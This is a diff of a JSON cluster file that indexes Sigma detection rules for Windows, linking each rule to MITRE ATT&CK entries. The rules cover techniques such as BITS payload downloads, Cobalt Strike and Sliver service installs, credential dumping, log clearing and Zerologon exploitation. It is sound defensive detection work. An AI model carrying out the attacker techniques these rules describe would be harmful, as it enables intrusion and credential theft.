"tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "57b649ef-ff42-4fb0-8bf6-62da243a1708", "value": "Windows Defender Threat Detected" }, @@ -8488,8 +10670,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml" ], "tags": [ 
@@ -8524,6 +10706,43 @@ "uuid": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "value": "Win Defender Restored Quarantine File" }, + { + "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "win_bits_client_direct_ip_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", + "value": "Suspicious Download with BITS from Direct IP" + }, { "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", "meta": { 
@@ -8546,6 +10765,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "value": "Suspicious Download File Extension with BITS" }, @@ -8571,6 +10799,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", "value": "Suspicious Task Added by Powershell" }, @@ -8596,6 +10833,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", "value": "Suspicious Task Added by Bitsadmin" }, @@ -8621,6 +10867,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "value": "Download with BITS to Suspicious Folder" }, 
@@ -8637,9 +10892,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" ], "tags": [ @@ -8648,6 +10903,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", "value": "Suspicious Download with BITS from Suspicious TLD" }, @@ -8664,8 +10928,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml" ], "tags": [ 
@@ -8674,6 +10938,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "value": "Suspicious Uncommon Download with BITS from Suspicious TLD" }, @@ -8690,8 +10963,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://ngrok.com/", + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" ], "tags": [ @@ -8699,6 +10972,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", "value": "Ngrok Usage with Remote Desktop Service" }, 
@@ -8710,15 +10992,15 @@
 "falsepositive": [
 "Unknown"
 ],
- "filename": "win_susp_dns_config.yml",
+ "filename": "win_dns_server_susp_dns_config.yml",
 "level": "high",
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx",
- "https://twitter.com/gentilkiwi/status/861641945944391680",
 "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_susp_dns_config.yml"
+ "https://twitter.com/gentilkiwi/status/861641945944391680",
+ "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml"
 ],
 "tags": [
 "attack.defense_evasion",
@@ -8751,6 +11033,15 @@
 "attack.t1569.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "52a85084-6989-40c3-8f32-091e12e13f09",
 "value": "smbexec.py Service Installation"
 },
@@ -8777,6 +11068,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "487c7524-f892-4054-b263-8a0ace63fc25",
 "value": "Invoke-Obfuscation Via Stdin - System"
 },
@@ -8803,6 +11103,22 @@ "attack.t1134.002" ] }, + "related": [ + { + "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - System" }, @@ -8877,6 +11193,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a31b18a-f00c-4061-9900-f735b96c99fc", "value": "Remote Access Tool Services Have Been Installed - System" }, @@ -8971,6 +11296,15 @@ "attack.t1584" ] }, + "related": [ + { + "dest-uuid": "7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", "value": "Windows Update Error" }, @@ -9021,6 +11355,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", "value": "PAExec Service Installation" }, @@ -9047,6 +11390,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - System" }, 
@@ -9073,6 +11425,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b", "value": "Invoke-Obfuscation Via Use Rundll32 - System" }, @@ -9097,6 +11458,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", "value": "Service Installed By Unusual Client - System" }, @@ -9121,6 +11491,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "value": "PowerShell Scripts Installed as Services" }, @@ -9137,9 +11516,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", "https://www.sans.org/webcasts/119395", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml" ], "tags": [ @@ -9151,6 +11530,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5a105d34-05fc-401e-8553-272b45c1522d", "value": "CobaltStrike Service Installations - System" }, 
@@ -9174,6 +11562,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "839dd1e8-eda8-4834-8145-01beeee33acd", "value": "SAM Dump to AppData" }, @@ -9190,9 +11587,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" ], "tags": [ @@ -9226,6 +11623,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "175997c5-803c-4b08-8bb0-70b099f47595", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System" }, @@ -9251,6 +11657,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4", "value": "Hacktool Service Registration or Execution" }, @@ -9267,8 +11682,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/zerosum0x0/CVE-2019-0708", "https://github.com/Ekultek/BlueKeep", + "https://github.com/zerosum0x0/CVE-2019-0708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml" ], "tags": [ 
@@ -9277,6 +11692,15 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885", "value": "Potential RDP Exploit CVE-2019-0708" }, @@ -9300,6 +11724,15 @@ "attack.lateral_movement" ] }, + "related": [ + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18f37338-b9bd-4117-a039-280c81f7a596", "value": "Zerologon Exploitation Using Well-known Tools" }, @@ -9326,6 +11759,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation STDIN+ Launcher - System" }, @@ -9375,6 +11817,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", "value": "Mesh Agent Service Installation" }, @@ -9402,6 +11853,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", "value": "Sliver C2 Default Service Installation" }, 
@@ -9452,6 +11912,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75", "value": "Invoke-Obfuscation VAR+ Launcher - System" }, @@ -9549,6 +12018,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df", "value": "Sysmon Crash" }, @@ -9575,6 +12053,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System" }, @@ -9625,6 +12112,15 @@ "car.2016-04-002" ] }, + "related": [ + { + "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "value": "Eventlog Cleared" }, @@ -9697,6 +12193,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "value": "QuarksPwDump Clearing Access History" }, @@ -9723,6 +12228,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "value": "ProcessHacker Privilege Elevation" }, 
@@ -9826,6 +12340,15 @@ "car.2016-04-002" ] }, + "related": [ + { + "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", "value": "System Eventlog Cleared" }, @@ -9842,9 +12365,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" ], "tags": [ @@ -9924,6 +12447,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f512acbf-e662-4903-843e-97ce4652b740", "value": "Volume Shadow Copy Mount" }, @@ -9973,6 +12505,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", "value": "TacticalRMM Service Installation" }, 
@@ -10029,6 +12570,50 @@ "attack.s0005" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "value": "Credential Dumping Tools Service Execution - System" }, @@ -10052,6 +12637,15 @@ "attack.t1048" ] }, + "related": [ + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "value": "Tap Driver Installation" }, 
@@ -10083,6 +12677,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92", "value": "Chafer Activity - System" }, @@ -10107,6 +12717,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "value": "KrbRelayUp Service Installation" }, @@ -10133,6 +12752,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", "value": "Invoke-Obfuscation Via Use MSHTA - System" }, @@ -10159,6 +12787,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c", "value": "Invoke-Obfuscation Via Use Clip - System" }, @@ -10185,6 +12822,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation CLIP+ Launcher - System" }, 
@@ -10209,6 +12855,15 @@ "attack.t1557.001" ] }, + "related": [ + { + "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "value": "Local Privilege Escalation Indicator TabTip" }, @@ -10233,6 +12888,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a", "value": "Vulnerable Netlogon Secure Channel Connection Allowed" }, @@ -10259,6 +12923,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28", "value": "PsExec Service Installation" }, @@ -10355,6 +13028,15 @@ "attack.t1554" ] }, + "related": [ + { + "dest-uuid": "960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f", "value": "HybridConnectionManager Service Running" }, @@ -10429,6 +13111,15 @@ "attack.t1071" ] }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3db10f25-2527-4b79-8d4b-471eb900ee29", "value": "GALLIUM Artefacts - Builtin" }, 
@@ -10445,8 +13136,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://twitter.com/mattifestation/status/899646620148539397", + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" ], "tags": [ @@ -10455,6 +13146,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "value": "WMI Persistence" }, @@ -10471,9 +13171,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" ], "tags": [ 
@@ -10486,6 +13186,50 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "value": "File Was Not Allowed To Run" }, 
@@ -10500,11 +13244,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", - "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427", + "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", "https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c", + "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" ], "tags": [ 
